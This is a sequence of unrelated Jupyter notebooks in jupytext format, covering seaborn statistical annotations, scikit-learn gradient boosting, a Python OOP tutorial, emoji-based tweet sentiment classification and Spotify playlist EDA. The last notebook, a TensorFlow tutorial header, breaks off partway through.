plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1))

# ### Tuning y offsets

x = "day"
y = "total_bill"
hue = "smoker"
ax = sns.boxplot(data=df, x=x, y=y, hue=hue)
add_stat_annotation(ax, data=df, x=x, y=y, hue=hue,
                    box_pairs=[(("Thur", "No"), ("Fri", "No")),
                               (("Sat", "Yes"), ("Sat", "No")),
                               (("Sun", "No"), ("Thur", "Yes"))],
                    test='t-test_ind', text_format='full', loc='inside',
                    line_offset_to_box=0.2, line_offset=0.02,
                    line_height=0.02, text_offset=2,
                    verbose=2)
plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1))

# +
# In certain cases, we would prefer to place each annotation just above the boxes,
# without increasing the y offset.
x = "day"
y = "total_bill"
hue = "smoker"
ax = sns.boxplot(data=df, x=x, y=y, hue=hue)
add_stat_annotation(ax, data=df, x=x, y=y, hue=hue,
                    box_pairs=[((day, "Yes"), (day, "No")) for day in df['day'].unique()],
                    test='t-test_ind', text_format='star',
                    loc='inside', stack=False)
plt.legend(loc='upper left', bbox_to_anchor=(1.03, 1))
example/example.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/HenriqueCCdA/bootCampAluraDataScience/blob/master/modulo1/desafios/Desafio_aula2_modulo1_pynb.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="DUM31X_UYcz7" # # Desafios aula 2 do modulo 1 # + id="77I4MBxYX-jn" import pandas as pd import matplotlib.pyplot as plt # pandas configuracao pd.options.display.float_format ="{:.2f}".format # + colab={"base_uri": "https://localhost:8080/"} id="NIQnEPw3Xuis" outputId="c3064df7-0658-412b-b03a-e306375d22ba" uri = "https://raw.githubusercontent.com/alura-cursos/agendamento-hospitalar/main/dados/A160324189_28_143_208.csv" dados = pd.read_csv(uri, encoding="ISO-8859-1", skiprows = 3, sep=";", skipfooter=12, thousands=".", decimal=",") # + id="sEbuSJggYFko" colunas_usaveis = dados.mean().index.tolist() colunas_usaveis.insert(0, "Unidade da Federação") dados_usaveis = dados[colunas_usaveis] dados_usaveis = dados_usaveis.set_index("Unidade da Federação") dados_usaveis = dados_usaveis.drop("Total", axis=1) # + [markdown] id="DP8hRm3RYSMt" # # Desafio 01: Reposicionar a legenda do gráfico em uma posição mais adequada # + colab={"base_uri": "https://localhost:8080/", "height": 499} id="RiY08WU_YUbA" outputId="49b768aa-a8b5-4599-f1fb-d2a257c631dd" dados_usaveis.T.plot(figsize=(12, 8)) plt.legend(title= "Estados", loc ='lower right', bbox_to_anchor=(1.25, 0.05)) plt.show() # + [markdown] id="PAUeLy1WYVJE" # # Desafio 02: Plotar o gráfico de linha com apenas 5 estados de sua preferência # + colab={"base_uri": "https://localhost:8080/"} id="9qcxlJNZYYEo" outputId="2fa85263-d31b-4fa7-f95c-5820bf90901d" dados_usaveis.index # + id="JT7kf4LvpaAj" 
# Five chosen states, written as "<IBGE code> <name>" to match the index
# labels of `dados_usaveis`. Code 51 is Mato Grosso; the name was garbled
# in the original source ("51 Mat<NAME>") and is restored here.
estados_escolidos = ['31 Minas Gerais',
                     '51 Mato Grosso',
                     '53 Distrito Federal',
                     '29 Bahia',
                     '33 Rio de Janeiro']

# + colab={"base_uri": "https://localhost:8080/", "height": 512} id="RdQ6Q4G0pvcf" outputId="e032f0cb-41e7-494c-8e29-125cd47b59b4"
# Select only the chosen states and transpose so years run along the x-axis.
dados_usaveis.loc[estados_escolidos].T.plot(figsize=(12, 8))

# + id="wOqRfBaepx3f"
modulo1/desafios/Desafio_aula2_modulo1.ipynb
# # 📝 Exercise M6.05 # # The aim of the exercise is to get familiar with the histogram # gradient-boosting in scikit-learn. Besides, we will use this model within # a cross-validation framework in order to inspect internal parameters found # via grid-search. # # We will use the California housing dataset. # + from sklearn.datasets import fetch_california_housing data, target = fetch_california_housing(return_X_y=True, as_frame=True) target *= 100 # rescale the target in k$ # - # First, create a histogram gradient boosting regressor. You can set the # trees number to be large, and configure the model to use early-stopping. # + # Write your code here. from sklearn.experimental import enable_hist_gradient_boosting from sklearn.ensemble import HistGradientBoostingRegressor histogram_gradient_boosting = HistGradientBoostingRegressor( max_iter=1000, early_stopping=True) histogram_gradient_boosting.fit(data, target) histogram_gradient_boosting.n_iter_ # - # We will use a grid-search to find some optimal parameter for this model. # In this grid-search, you should search for the following parameters: # # * `max_depth: [3, 8]`; # * `max_leaf_nodes: [15, 31]`; # * `learning_rate: [0.1, 1]`. # # Feel free to explore the space with additional values. Create the # grid-search providing the previous gradient boosting instance as the model. # + from sklearn.model_selection import GridSearchCV import pandas as pd # Write your code here. 
param_grid = { "max_depth": [3, 8], "max_leaf_nodes": [15, 31], "learning_rate": [0.1, 1], } grid_search = GridSearchCV( histogram_gradient_boosting, param_grid=param_grid, scoring="neg_mean_absolute_error", n_jobs=-1 ) grid_search.fit(data, target) columns = [f"param_{name}" for name in param_grid.keys()] columns += ["mean_test_score", "rank_test_score"] cv_results = pd.DataFrame(grid_search.cv_results_) cv_results["mean_test_score"] = -cv_results["mean_test_score"] cv_results[columns].sort_values(by="rank_test_score") # - # Finally, we will run our experiment through cross-validation. In this regard, # define a 5-fold cross-validation. Besides, be sure to shuffle the data. # Subsequently, use the function `sklearn.model_selection.cross_validate` # to run the cross-validation. You should also set `return_estimator=True`, # so that we can investigate the inner model trained via cross-validation. # + # Write your code here. from sklearn.model_selection import cross_validate from sklearn.model_selection import KFold cv = KFold(n_splits=5, shuffle=True, random_state=0) cv_results_hist = cross_validate( histogram_gradient_boosting, data, target, cv=cv, n_jobs=-1, return_estimator=True ) print("Hist Gradient Boosting Decision Tree") print(f"Mean absolute error via cross-validation: " f"{-cv_results_hist['test_score'].mean():.3f} +/- " f"{cv_results_hist['test_score'].std():.3f} k$") print(f"Average fit time: " f"{cv_results_hist['fit_time'].mean():.3f} seconds") print(f"Average score time: " f"{cv_results_hist['score_time'].mean():.3f} seconds") # - # Now that we got the cross-validation results, print out the mean and # standard deviation score. # Write your code here. # Then, inspect the `estimator` entry of the results and check the best # parameters values. Besides, check the number of trees used by the model. # Write your code here. 
# Inspect each model fitted during the outer cross-validation.
# `cross_validate` was called with the HistGradientBoostingRegressor itself
# (not the GridSearchCV object), so every entry of
# `cv_results_hist['estimator']` is a fitted HistGradientBoostingRegressor.
# Such an estimator exposes `n_iter_` directly and has NO `best_estimator_`
# or `best_params_` attribute — the original `est.best_estimator_.n_iter_`
# raised AttributeError.
for est in cv_results_hist['estimator']:
    print(f"# trees: {est.n_iter_}")

# Inspect the results of the inner CV for each estimator of the outer CV.
# Aggregate the mean test score for each parameter combination and make a box
# plot of these scores.

# Write your code here.
notebooks/ensemble_ex_05.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from WenShuan import WenShuan from unicodedata import numeric # # WenShuan -- What happens to the number of separate pieces (765 comparing to 528) # # We noticed that the number of pieces in the `wenshuan.flat_bodies` is different from the number 761 listed in the https://en.wikipedia.org/wiki/Wen_Xuan . # ## Loading the Wenshuan class wenshuan = WenShuan('2018-06-08', 'MF') wenshuan.load_htmls() wenshuan.extract_paths() # extract the bookmarks wenshuan.get_author_bag() # get the bag of author names and comments wenshuan.extract_meta() # extract the meta data wenshuan.passages2tuples() # get the passsage into (text, comment) tuples wenshuan.heads2tuples() # get headers into (head, comment, ...) tuples wenshuan.extract_commentators() # append commentators to metadata wenshuan.extract_sound_glosses() # append all sound glosses in comments into a list and remove them from the self.flat_passages # ## Number of elements in the `paths` len(wenshuan.paths) # It is much less than the number listed in the wiki. # ## Counting the num pieces in the paths # # One possible hypothesis is that, in Han-Ji, they merged several pieces of works in one page. Therefore, we should count the difference between the actual number in `wenshuan.paths` and number stated in the `bookmark`. # # Note: `unicodedata.numeric` could convert Chinese integers into numeric numbers. 
# + # build a string list for chinese integer chinese_int = ['一','二','三','四','五','六','七','八','九'] # create a dict for str -> int chinese_int_dict = {} # I am playing dirty, create a list for decimal numbers chinese_decimal = ['十'] + [ digit + decimal for digit in chinese_int for decimal in ['十'] ] numerical_decimal = [10] + [ digit * decimal for digit in range(1, 10) for decimal in [10] ] # for digit for digit in chinese_int: chinese_int_dict[digit] = int(numeric( digit )) # for decimal for decimal,num in zip(chinese_decimal, numerical_decimal): chinese_int_dict[decimal] = num for digit in chinese_int: chinese_int_dict[decimal + digit] = num + int(numeric( digit )) chinese_int_dict # - # ## Examining the occurrence of number in the bookmarks # # # + import re # count the actual number of pieces (number of pages) of works in WenShuan paths paths_text = ''.join(wenshuan.paths) paths_dict = {} for element in set([element for path in wenshuan.paths for element in path.split('/') if '首' in element]): paths_dict[element] = paths_text.count(element) # + # count the difference between number in pages and number in bookmark difference = 0 for path, num_of_pieces in paths_dict.items(): # capture the number of pieces in the bookmarks for match in re.finditer(r'([一二三四五六七八九十]+?)首', path): num_in_path = chinese_int_dict[match.group(1)] # compage num_of_pieces (in pages) and num_in_path (in bookmark) if num_of_pieces != num_in_path: print("[Warning] Number of pieces are not match with the number in bookmark.", path, (num_of_pieces, num_in_path)) difference += num_in_path - num_of_pieces difference # - len(wenshuan.paths) + difference # It turns out very similar to the number in the wiki, so we are ok.
tutorials/WenShuan -- What happens to the number of separate pieces (76X comparing to 528).ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # %%HTML <style> div#notebook-container.container { /* This acts as a spacer between cells, that is outside the border */ margin: 2px 0px 2px 0px; list-style: none; padding: 0; margin: 0; -ms-box-orient: horizontal; display: -webkit-box; display: -moz-box; display: -ms-flexbox; display: -moz-flex; display: -webkit-flex; display: flex; justify-content: space-around; -webkit-flex-wrap: wrap; flex-wrap: wrap; -webkit-flex-direction: row; flex-direction: row; } div.cell { width:550px } </style> # The code on the left is a hack to make this notebook two-column. I found it here: # # http://stackoverflow.com/questions/23370670/ipython-notebook-put-code-cells-into-columns # # # # Object Oriented Programming (OOP) in Python # # Welcome to the OOP-session of our Python course! This notebook introduces Python's OOP-concepts in a two column-style side by side with an equivalent formulation in Java respectively. # # We chose Java here, as it is a popular OOP-enabled language that many of you are probably familiar with. Also, we found it helpful to compare Python-style to *some* other language and Java-OOP is still somewhat easier to read than OOP in C-ish languages. # ## Basic class with constructor etc # # **Python** # ##   # # **Java** # ```python # class SpaceShip(SpaceObject): # bgColor = (0, 0, 0, 0) # # def __init__(color, position): # super(SpaceShip, self).__init__( # position) # self.color = color # # def fly(self, moveVector): # self.position += moveVector # # @staticmethod # def get_bgColor(): # return SpaceShip.bgColor # ``` # # # See https://julien.danjou.info/blog/2013/guide-python-static-class-abstract-methods for a guide about the decorators `@staticmethod`, `@classmethod` and `abstractmethod`. # # Classmethods have no equivalent in Java. 
They are like special static methods that get the class as their initial, implicit argument: # # ```python # @classmethod # def get_bgColor(cls): # return cls.bgColor # ``` # ```java # public class SpaceShip extends SpaceObject { # public static Color bgColor = # new Color(0, 0, 0, 0); # public Color color; # # public SpaceShip(Color col, Vec3D pos) { # super(pos); # color = col; # } # # public void fly(Vec3D move) { # position.add(move); # } # # public static Color get_bgColor() { # return bgColor; # } # } # ``` # ## Abstract classes # # ```python # from abc import ABCMeta # # class Target(): # __metaclass__ = ABCMeta # # @abstractmethod # def hit(self, strength): # pass # ``` # ```java # public interface Target { # public void hit(double strength); # } # //or # public abstract class Target { # public abstract void hit(double strength); # } # ``` # ## Multiple inheritance # # ```python # class SpaceShip(SpaceObject, Target): # # def hit(self, strength): # print "Damn I'm hit." # ``` # ```java # public class SpaceShip extends SpaceObject # implements Target { # # public void hit(double strength) { # System.out.println("Damn I'm hit."); # } # } # ``` # ```python # class Hitpoints(Target): # def __init__(self): # self.hitpoints = 100 # # def hit(self, strength): # self.hitpoints -= strength # # # class SpaceShip(SpaceObject, Hitpoints): # def __init__(self): # Hitpoints.__init__(self) # super(SpaceShip, self).__init__() # ``` # ```java # public class HitpointSpaceShip extends # SpaceShip implements Hitpoints { # double hitpoints = 100.0; # } # # public interface Hitpoints extends Target { # //Java 8 introduced default-implementations: # default void hit(double strength) { # ((HitpointSpaceShip) this).hitpoints -= # strength; # } # } # ``` # ## Overloading operators # # ```python # class Fraction(): # # def __init__(self, numerator,denominator): # self.num = numerator # self.den = denominator # # def __mul__(self, other): # return Fraction(self.num * other.num, # 
self.den * other.den) # ``` # Overview of magic methods: # # http://www.rafekettler.com/magicmethods.html # ### Task: # # Implement numerical and logical magic methods. (How many can you get done in the available time?) # # Also consider the idea that numerator and denominator are functions, e.g. numpy.polynomial.polynomial. In this case Fraction shall also act as a function. How can you achieve this? # # # # ## New-style classes # # __Classic class:__ # Original essay about new-style classes by <NAME>: # https://www.python.org/download/releases/2.2.3/descrintro/ # # __New-style class:__ # + class classA(): pass a = classA() print type(a) # + class classA(object): pass a = classA() print type(a) # - # ### Extending built-in types # # Note that multi-inheritence is constrained to one built-in type only. You cannot extend multiple built-in types. # # + class evenInt(int): def __init__(self, value): if value % 2 != 0: raise ValueError(str(value)+ ' is not even') super(evenInt, self).__init__(value) a = evenInt(24) b = 9 a+b # + class defaultdict(dict): def __init__(self, default=None): dict.__init__(self) self.default = default def __getitem__(self, key): try: return dict.__getitem__(self, key) except KeyError: return self.default a = defaultdict(default=0.0) print a a['x1'] = 1 print a['x1'] print a print a['x2'] a.y = '7' print a.y print a.__dict__ # - # ### Slots # # Slots can replace the mutable class-dictionary `__dict__` by a fixed data structure. `__slots__` disallows adding or removing attributes to a class. # Its main purpose is to avoid the need of lots of dictionaries when something simple like `int` is subclassed. 
# # Basic slot-example: # ## # #### # #### # You cannot modify slots afterwards (well, you can, but it doesn't add the attribute): # + class defaultdict(dict): __slots__ = ['default'] def __init__(self, default=None): dict.__init__(self) self.default = default def __getitem__(self, key): try: return dict.__getitem__(self, key) except KeyError: return self.default a = defaultdict(default=0.0) print a a['x1'] = 1 print a['x1'] print a print a['x2'] #a.y = '7' #print a.y #print a.__dict__ print a.__slots__ # + class defaultdict(dict): __slots__ = ['default'] def __init__(self, default=None): dict.__init__(self) self.default = default def __getitem__(self, key): try: return dict.__getitem__(self, key) except KeyError: return self.default a = defaultdict(default=0.0) print a a['x1'] = 1 print a['x1'] print a print a['x2'] #a.y = '7' #print a.y #print a.__dict__ print a.__slots__ a.__slots__.append('y') print a.__slots__ a.y = '7' print a.y # - # Some notes on slots: # # - cannot be used in not-only-`__slot__` subclasses # - There's no check to prevent name conflicts # between the slots defined in a class and the # slots defined in its base classes # - You cannot use slots with "variable-length" # built-in types as base class. Variable-length # built-in types are long, str and tuple.
notebooks/Python OOP.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + jupyter={"outputs_hidden": false} # %load_ext autoreload # %autoreload 2 import math import gensim.models as gs import pickle as pk import sklearn.metrics as met import scipy.stats as stats import numpy as np from sklearn import cross_validation from sklearn.linear_model import SGDClassifier from sklearn.ensemble import RandomForestClassifier import twitter_sentiment_dataset as tsd import phrase2vec as p2v from twitter_sentiment_dataset import TweetTrainingExample from model import ModelParams # - # # Setup # Load the three vector representations from files. In general, any variable with the word 'none' in it refers to Google News word2vec w/o any emoji vectors, 'ours' to Google News word2vec w/ vectors we trained, and 'theirs' to Google News word2vec with the vectors trained by Barbieri et. al. 
# + jupyter={"outputs_hidden": true} w2v_path='./data/word2vec/google_w2v_without_emoji.bin' in_dim = 300 # Length of word2vec vectors out_dim = 300 # Desired dimension of output vectors pos_ex = 4 neg_ratio = 1 max_epochs = 40 dropout = 0.0 params = ModelParams(in_dim=in_dim, out_dim=out_dim, pos_ex=pos_ex, max_epochs=max_epochs, neg_ratio=neg_ratio, learning_rate=0.001, dropout=dropout, class_threshold=0.5) e2v_ours_path = params.model_folder('unicode') + '/emoji2vec.bin' e2v_theirs_path = './data/word2vec/emoji_subset_theirs.bin' # + jupyter={"outputs_hidden": false} w2v = gs.Word2Vec.load_word2vec_format(w2v_path, binary=True) e2v_ours = gs.Word2Vec.load_word2vec_format(e2v_ours_path, binary=True) e2v_theirs = gs.Word2Vec.load_word2vec_format(e2v_theirs_path, binary=True) # + jupyter={"outputs_hidden": true} p2v_no_emoji = p2v.Phrase2Vec(out_dim, w2v, e2v=None) p2v_our_emoji = p2v.Phrase2Vec(out_dim, w2v, e2v=e2v_ours) p2v_their_emoji = p2v.Phrase2Vec(out_dim, w2v, e2v=e2v_theirs) # - # Using stats scraped from emojitracker.com at a certain point in time, we generate two sets of emoji: the top 173 most frequently used emoji, whose usage constitutes 90% of emoji usage on Twitter, and the bottom 612 least frequently used emoji, whose usage constitutes 10% of emoji usage on Twitter. # # Subsequently, 'common' will refer to the former group, while 'rare' will refer to the latter. 
# + jupyter={"outputs_hidden": false}
# Read the emoji-frequency list (one "<emoji>\t<count>" line per emoji,
# sorted by usage) and keep only the emoji character of each line.
# A context manager replaces the original open/readlines/close sequence,
# which called p.close() twice and leaked the handle on error.
with open('./data/tweets/frequencies_w_emoji.txt', 'r') as p:
    ems = [l.split('\t')[0] for l in p.readlines()]

# The 173 most frequent emoji constitute ~90% of Twitter emoji usage
# ("common"); the remainder constitute ~10% ("rare").
top90 = set(ems[:173])
bottom10 = set(ems[173:])

# + jupyter={"outputs_hidden": true}
def emoji_dataset_stats(tweets):
    """Return (total tweets, tweets with any known emoji, with common emoji, with rare emoji)."""
    total_tweets = len(tweets)
    total_emoji = tsd.num_tweets_with_emoji(tweets, e2v_ours, e2v_theirs, ems)
    top_90_total = tsd.num_tweets_with_emoji(tweets, set(), set(), top90)
    bottom_10_total = tsd.num_tweets_with_emoji(tweets, set(), set(), bottom10)
    return total_tweets, total_emoji, top_90_total, bottom_10_total
# -

# Statistics for the entire Twitter corpus. Counts refer to # of tweets containing emoji of a type.

# + jupyter={"outputs_hidden": false}
train_tweets, test_tweets = tsd.load_training_test_sets()

print('All Tweets in corpus: %s, total emoji: %s, common emoji: %s, rare emoji: %s'
      % emoji_dataset_stats(tsd.get_all_examples()))
print('Training set: total tweets: %s, total emoji: %s, common emoji: %s, rare emoji: %s'
      % emoji_dataset_stats(train_tweets))
print('Test set: total tweets: %s, total emoji: %s, common emoji: %s, rare emoji: %s'
      % emoji_dataset_stats(test_tweets))

# + jupyter={"outputs_hidden": false}
def emoji_dataset_label_stats(tweets):
    """Print the fraction of tweets carrying each sentiment label."""
    res = dict()
    res['Positive'] = 0
    res['Negative'] = 0
    res['Neutral'] = 0
    for tweet in tweets:
        res[tweet.label] += 1/len(tweets)
    print(res)

# + jupyter={"outputs_hidden": false}
emoji_dataset_label_stats(train_tweets)
emoji_dataset_label_stats(test_tweets)
# -

# ## Prepare Training and Testing Vectors

# Given the raw training and test tweets, calculate the vector representations for each tweet for each model.
# + jupyter={"outputs_hidden": false} train_none, train_y = tsd.prepare_tweet_vector_averages(train_tweets, p2v_no_emoji) train_ours, _ = tsd.prepare_tweet_vector_averages(train_tweets, p2v_our_emoji) train_theirs, _ = tsd.prepare_tweet_vector_averages(train_tweets, p2v_their_emoji) # + jupyter={"outputs_hidden": false} test_none, test_y = tsd.prepare_tweet_vector_averages(test_tweets, p2v_no_emoji) test_ours, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_our_emoji) test_theirs, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_their_emoji) # - # # Classification # + jupyter={"outputs_hidden": false} classifiers = { 'SGD (n_iter=50)' : SGDClassifier(n_iter=50), 'Random Forest (n_estimators=60)' : RandomForestClassifier(n_estimators=60) } # + jupyter={"outputs_hidden": true} def train_all_with_cross_validation(train_none, train_ours, train_theirs, train_y, clf, clf_name, cv=5): scores_none = cross_validation.cross_val_score(clf, train_none, train_y, cv=cv) print("None: %s Train Accuracy: %0.2f (+/- %0.3f)" % (clf_name, scores_none.mean(), scores_none.std() * 2)) scores_ours = cross_validation.cross_val_score(clf, train_ours, train_y, cv=cv) print("Ours: %s Train Accuracy: %0.2f (+/- %0.3f)" % (clf_name, scores_ours.mean(), scores_ours.std() * 2)) scores_theirs = cross_validation.cross_val_score(clf, train_theirs, train_y, cv=cv) print("Theirs: %s Train Accuracy: %0.2f (+/- %0.3f)" % (clf_name, scores_theirs.mean(), scores_theirs.std() * 2)) # + jupyter={"outputs_hidden": true} def train_and_predict(train_data, train_y, test_data, test_y, clf): clf.fit(train_data, train_y) predictions = clf.predict(test_data) score = met.accuracy_score(test_y, predictions) f1 = met.f1_score(test_y, predictions, average='weighted') return predictions, score, f1 # + jupyter={"outputs_hidden": true} def train_and_predict_all(train_none, test_none, train_ours, test_ours, train_theirs, test_theirs, test_y, clf, clf_name): none_pred, none_acc, none_f1 = 
train_and_predict(train_none, train_y, test_none, test_y, clf) print('None: %s Test Accuracy: %0.5f, f1=%0.5f' % (clf_name, none_acc, none_f1)) ours_pred, ours_acc, ours_f1 = train_and_predict(train_ours, train_y, test_ours, test_y, clf) ours_p = tsd.calculate_mcnemars(none_pred, ours_pred, test_y) print('Ours: %s Test Accuracy: %0.5f, p=%0.5f, f1=%0.5f' % (clf_name, ours_acc, ours_p, ours_f1)) theirs_pred, theirs_acc, theirs_f1 = train_and_predict(train_theirs, train_y, test_theirs, test_y, clf) theirs_p = tsd.calculate_mcnemars(none_pred, theirs_pred, test_y) print('Theirs: %s Test Accuracy: %0.5f, p=%0.5f, f1=%0.5f' % (clf_name, theirs_acc, theirs_p, theirs_f1)) ours_theirs_p = tsd.calculate_mcnemars(ours_pred, theirs_pred, test_y) print('Significance between ours and theirs: p=%0.5f' % ours_theirs_p) # - # ## Performance on Training Set and Complete Test Set # For each classifier, we calculate the average performance of the classifier on the training set when cross validation is applied, as well as the accuracy on the complete test set. 
# + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) print() print('Cross Validation Accuracy on Training Set\n') train_all_with_cross_validation(train_none, train_ours, train_theirs, train_y, clf, clf_name, cv=5) print() print('Accuracy on Test Set\n') train_and_predict_all(train_none, test_none, train_ours, test_ours, train_theirs, test_theirs, test_y, clf, clf_name) print() # + jupyter={"outputs_hidden": true} def train_and_predict_all_on_test_subset(test_tweets, clf, clf_name): test_none, test_y = tsd.prepare_tweet_vector_averages(test_tweets, p2v_no_emoji) test_ours, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_our_emoji) test_theirs, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_their_emoji) train_and_predict_all(train_none, test_none, train_ours, test_ours, train_theirs, test_theirs, test_y, clf, clf_name) # + jupyter={"outputs_hidden": true} emoji_test_tweets = tsd.get_tweets_with_emoji(test_tweets, e2v_ours, e2v_theirs, ems) emoji_test_tweets_top90 = tsd.get_tweets_with_emoji(test_tweets, set(), set(), top90) emoji_test_tweets_bottom10 = tsd.get_tweets_with_emoji(test_tweets, set(), set(), bottom10) # - # ## Test Subset - All Tweets with Emoji # For each classifier, we calculate the accuracy on the subset of test examples that contain emoji. # + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) train_and_predict_all_on_test_subset(emoji_test_tweets, clf, clf_name) print() # - # ## Test Subset - All Tweets with Common Emoji # For each classifier, we calculate the accuracy on the subset of test examples that contain common (Top 90%) emoji. 
# + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) train_and_predict_all_on_test_subset(emoji_test_tweets_top90, clf, clf_name) print() # - # ## Test Subset - All Tweets with Rare Emoji # For each classifier, we calculate the accuracy on the subset of test examples that contain rare (Bottom 10%) emoji. # + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) train_and_predict_all_on_test_subset(emoji_test_tweets_bottom10, clf, clf_name) print() # + jupyter={"outputs_hidden": true}
TwitterClassification.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # EDA import pickle import seaborn as sns import numpy as np import pandas as pd import matplotlib import matplotlib.pyplot as plt import matplotlib.ticker as tick import sys import os # %matplotlib inline plt.style.use('seaborn') # ## Spotify API Data # + ''' Load Data (see data retrieval notebook)''' with open('aggregate_data.p', 'rb') as f: data = pickle.load(f) cats = data['category'] data = data[[x for x in data.columns if x != 'category']].astype(float) data['category'] = cats #split into train / test to avoid cheating np.random.seed(1234) train_pct = .5 msk = np.random.uniform(0,1,len(data)) < train_pct train = data.loc[msk, :] test = data.loc[~msk, :] avgs = train.groupby('category').mean() # - # ### What Playlist categories tend to have the most followers? pd.Series(avgs['num_followers']).sort_values(ascending = False).plot(kind = 'bar') plt.xlabel('Spotify Playlist Category', fontsize = 20) plt.ylabel('Average Number of Followers', fontsize = 20) plt.title('Average Number of Playlist Followers by Spotify Playlist Category', fontsize = 20) plt.show() # ### What does the distribution of the number of followers look like? # + ''' Note that this is pretty skewed (many more playlists have a small # of followers) ''' ax = train['num_followers'].hist(weights = np.zeros_like(train['num_followers']) + 1. 
/ train['num_followers'].size) plt.title('Histogram of Number Of Followers of Spotify Playlists', fontsize = 20) plt.xlabel('Number of Followers (in Millions)', fontsize = 20) plt.ylabel('Percent of Training Dataset', fontsize = 20) ax.yaxis.set_major_formatter(tick.FuncFormatter(lambda y, _: '{:.0%}'.format(y))) plt.show() sns.boxplot(train['num_followers']) plt.title('Distribution of Number of Followers of a Playlist', fontsize = 20) plt.xlabel('Number of Followers (in millions)', fontsize = 20) plt.show() # - # ### Which categories tend to have the most popular songs? ''' Note that this is slightly different than above; the 'Party' category tends to have the most popular songs in it. Apparently no one really likes classical music. ''' avgs['popularity_mean'].sort_values(ascending = False).plot(kind = 'bar') plt.xlabel('Spotify Playlist Category', fontsize = 20) plt.ylabel('Average Popularity of Songs', fontsize = 20) plt.title('Average Popularity of Songs by Spotify Playlist Category', fontsize = 20) plt.show() # ### How are our quantitative variables correlated? # + ''' Note that the features that tend to be most correlated with number of followers generally make sense; they are popularity, artist and song 'hotttnesss,' artist familiarity, and whether or not the playlist is featured. 
''' quant_vars = np.sort([x for x in data.columns if x not in ['category','num_follower']]) # remove some variables for readability quant_vars = [x for x in quant_vars if '_median' not in x] quant_vars = [x for x in quant_vars if '_min' not in x] quant_vars = [x for x in quant_vars if '_max' not in x] corr = data[ quant_vars + ['num_followers']].astype(float).corr() # Set up the matplotlib figure f, ax = plt.subplots(figsize=(20, 20)) # Generate a mask for the upper triangle mask = np.zeros_like(corr, dtype=np.bool) mask[np.triu_indices_from(mask)] = True # Generate a custom diverging colormap cmap = sns.diverging_palette(10, 150, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0, square=True, linewidths=.5, cbar_kws={"shrink": .5}) plt.title('Correlations Among Quantitative Playlist Features', fontsize = 20) plt.show() # - # ## Million Songs Data # ### Artist Familiarity # + '''EDA of MSD Data -- these generally go in the correct direction + make sense given correlation data''' data.plot('artist_famil_mean', 'num_followers' ,kind = 'scatter') plt.xlabel('Average Artist Familiarity', fontsize = 20) plt.ylabel('Number of Followers', fontsize = 20) plt.title('Average Artist Familiarity v. Number of Followers', fontsize = 20) plt.show() # - # ### Artist Hotttnesss data.plot('artist_hot_mean', 'num_followers' ,kind = 'scatter') plt.xlabel('Average Artist Hotttnesss', fontsize = 20) plt.ylabel('Number of Followers', fontsize = 20) plt.title('Average Artist Hotttnesss v. Number of Followers', fontsize = 20) plt.show() # ### Song Hotttnesss data.plot('song_hot_mean', 'num_followers' ,kind = 'scatter') plt.xlabel('Average Song Hotttnesss', fontsize = 20) plt.ylabel('Number of Followers', fontsize = 20) plt.title('Average Song Hotttnesss v. 
Number of Followers', fontsize = 20) plt.show() # ### Song Popularity Compared to Hotttnesss '''These are positively correlated, which makes sense, but not perfectly so; there is colinearity but they are not the same metric (so both could theoretically have predictive power)''' data.plot('song_hot_mean', 'popularity_mean' ,kind = 'scatter') plt.xlabel('Average Song Hotttnesss', fontsize = 20) plt.ylabel('Average Song Popularity', fontsize = 20) plt.title('Average Song Hotttnesss v. Average Song Popularity', fontsize = 20) plt.show()
notebooks/EDA.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="pixDvex9KBqt" # ##### Copyright 2019 The TensorFlow Authors. # + cellView="form" id="K16pBM8mKK7a" #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # + [markdown] id="TfRdquslKbO3" # # tf.data を使って NumPy データをロードする # + [markdown] id="-uq3F0ggKlZb" # <table class="tfo-notebook-buttons" align="left"> # <td><a target="_blank" href="https://www.tensorflow.org/tutorials/load_data/numpy"><img src="https://www.tensorflow.org/images/tf_logo_32px.png">View on TensorFlow.org</a></td> # <td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/ja/tutorials/load_data/numpy.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png">Run in Google Colab</a></td> # <td><a target="_blank" 